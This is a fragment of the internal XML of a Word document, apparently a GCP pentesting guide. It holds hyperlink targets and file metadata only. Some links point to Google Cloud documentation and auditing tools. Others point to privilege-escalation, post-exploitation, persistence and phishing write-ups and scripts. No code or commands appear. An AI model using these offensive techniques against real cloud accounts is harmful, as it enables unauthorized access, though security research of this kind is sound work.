Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://console.cloud.google.com/iam-admin/asset-inventory/dashboard" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/turbot?q=gcp" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-privilege-escalation" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nccgroup/ScoutSuite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cloud.google.com/iam/docs/permissions-reference" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aquasecurity/cloudsploit/blob/master/docs/gcp.md" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/gcp_privesc_scripts" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" TargetMode="External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s://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ine-labs/GCPGoat" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JupiterOne/starbase" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/architecture/security-foundations/authentication-authorization" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google_project_iam" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/asset-inventory/docs/supported-asset-types" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/bf_my_gcp_permissions" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/turbot" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/turbot/steampipe-mod-terraform-aws-compliance" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/resource-manager/img/org-policy-concepts.svg" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/iam/docs/understanding-roles" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation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lyft.github.io/cartography/modules/gcp/config.html" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/compute/docs/access/service-accounts" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lacioffi/GCP-pentest-la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github.com/cyberark/SkyArk" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/iap/docs/programmatic-oauth-cli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rowler.cloud/en/latest/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://steampipe.io/downloads" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/orgs/turbot/repositories?q=aws" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/iam/docs/custom-roles-permissions-support" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-persistence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cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oauth.net/2/scope/" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/gcp_privesc_scripts" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/purplepanda" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0xsha/CloudBrute" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/gcp_scanner" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecurityFTW/cs-suite" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/turbot/steampipe-mod-gcp-insights" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/google-cloud/migrating-a-project-from-one-organization-to-another-gcp-4b37a86dd9e6" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-unaunthenticated-enum-and-access" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/prowler-cloud/prowler" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PurplePanda/tree/master/intel/google" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security" TargetMode="External"/><Relationship Id="rId121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hyperlink" Target="https://github.com/BishopFox/cloudfox" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/compute/docs/access/service-accounts" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectdiscovery/cloudlist" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://admin.google.com/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ozguralp/gmapsapiscanner" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/turbot/steampipe-mod-terraform-gcp-compliance" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/iam/docs/understanding-roles" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-unaunthenticated-enum-and-access" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aquasecurity/cloudsploit" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/resource-manager/docs/organization-policy/overview" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-Platform" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gcpgoat.joshuajebaraj.com/" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest" TargetMode="External"/><Relationship Id="rId1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51</Pages>
  <Words>11360</Words>
  <Characters>64757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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-07T20:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-08T04:16:00Z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2024-07-07T20:10:49Z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f1ce9c4f-1b17-4660-b946-3a86cf53dec7</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>